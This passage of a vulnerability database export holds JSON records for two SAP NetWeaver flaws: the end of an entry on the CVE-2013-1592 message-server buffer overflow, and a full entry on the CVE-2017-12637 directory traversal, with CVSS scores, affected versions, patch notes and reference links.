        "title": "SAP has issued an update to correct this vulnerability.",
        "trust": 0.7,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
      },
      {
        "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/18435"
      },
      {
        "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/18434"
      },
      {
        "title": "martingalloar",
        "trust": 0.1,
        "url": "https://github.com/martingalloar/martingalloar "
      },
      {
        "title": "publications",
        "trust": 0.1,
        "url": "https://github.com/martingalloar/publications "
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/57956"
      },
      {
        "trust": 1.7,
        "url": "https://packetstormsecurity.com/files/cve/cve-2013-1592"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/24511"
      },
      {
        "trust": 1.7,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1028148"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
      },
      {
        "trust": 1.4,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
      },
      {
        "trust": 0.7,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
      },
      {
        "trust": 0.6,
        "url": "http://seclists.org/bugtraq/2012/jun/186"
      },
      {
        "trust": 0.6,
        "url": "http://seclists.org/bugtraq/2012/jun/185"
      },
      {
        "trust": 0.3,
        "url": "http://www.sap.com/platform/netweaver/index.epx"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=28248"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/24511/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/martingalloar/martingalloar"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
      },
      {
        "trust": 0.1,
        "url": "https://service.sap.com/sap/support/notes/1800603."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
      },
      {
        "trust": 0.1,
        "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
      },
      {
        "trust": 0.1,
        "url": "http://www.sap.com/platform/netweaver/index.epx."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
      },
      {
        "trust": 0.1,
        "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
      },
      {
        "trust": 0.1,
        "url": "http://twitter.com/thezdi"
      },
      {
        "trust": 0.1,
        "url": "http://www.tippingpoint.com"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com"
      },
      {
        "trust": 0.1,
        "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-367"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-367"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-07-02T00:00:00",
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "date": "2012-06-27T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "date": "2020-01-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "date": "2013-02-13T00:00:00",
        "db": "BID",
        "id": "57956"
      },
      {
        "date": "2020-02-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "date": "2013-02-15T23:44:44",
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "date": "2012-06-28T03:51:55",
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "date": "2013-02-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201302-367"
      },
      {
        "date": "2020-01-23T19:15:11.327000",
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "date": "2012-06-28T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "date": "2012-06-27T00:00:00",
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "date": "2012-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "date": "2020-01-31T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "date": "2013-06-12T18:46:00",
        "db": "BID",
        "id": "57956"
      },
      {
        "date": "2020-02-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "date": "2020-05-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201302-367"
      },
      {
        "date": "2020-01-31T17:08:36.590000",
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-367"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-367"
      }
    ],
    "trust": 0.6
  }
}

VAR-201708-0889

Vulnerability from variot - Updated: 2024-02-20 02:13

Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. Attacks exploiting this vulnerability were observed in August 2017. The vendor has confirmed this vulnerability and released the fix as SAP Security Note 2486657. Information may be obtained.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201708-0889",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netweaver application server java",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "7.50"
      },
      {
        "model": "netweaver application server java",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.5"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sap",
        "version": "7.50"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "cve": "CVE-2017-12637",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-12637",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-12637",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-12637",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201708-277",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-12637",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. Attacks on this vulnerability were observed in August 2017. The vendor has confirmed this vulnerability and released the fix as SAP Security Note 2486657. Information may be obtained.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12637"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-12637",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12637",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "id": "VAR-201708-0889",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.27111164
  },
  "last_update_date": "2024-02-20T02:13:05.846000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "August 2017 (2486657)",
        "trust": 0.8,
        "url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
      },
      {
        "title": "Nuclei Templates\nResources",
        "trust": 0.1,
        "url": "https://github.com/merlinepedra25/nuclei-templates"
      },
      {
        "title": "Nuclei Templates\nResources",
        "trust": 0.1,
        "url": "https://github.com/merlinepedra/nuclei-templates"
      },
      {
        "title": "Kenzer Templates [1289]",
        "trust": 0.1,
        "url": "https://github.com/elsfa7-110/kenzer-templates"
      },
      {
        "title": "Kenzer Templates [5170] [DEPRECATED]",
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.sh0w.top/index.php/archives/7/"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12637"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12637"
      },
      {
        "trust": 0.8,
        "url": "https://www.onapsis.com/blog/sap-security-notes-august-2017-remote-code-injection-vulnerability-java-component"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/22.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/merlinepedra25/nuclei-templates"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12637"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12637"
      },
      {
        "date": "2017-09-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "date": "2017-08-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      },
      {
        "date": "2017-08-07T20:29:01.120000",
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-02-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12637"
      },
      {
        "date": "2017-09-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "date": "2021-04-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      },
      {
        "date": "2024-02-14T01:17:43.863000",
        "db": "NVD",
        "id": "CVE-2017-12637"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP NetWeaver Application Server Java Path traversal vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-006983"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      }
    ],
    "trust": 1.4
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-277"
      }
    ],
    "trust": 0.6
  }
}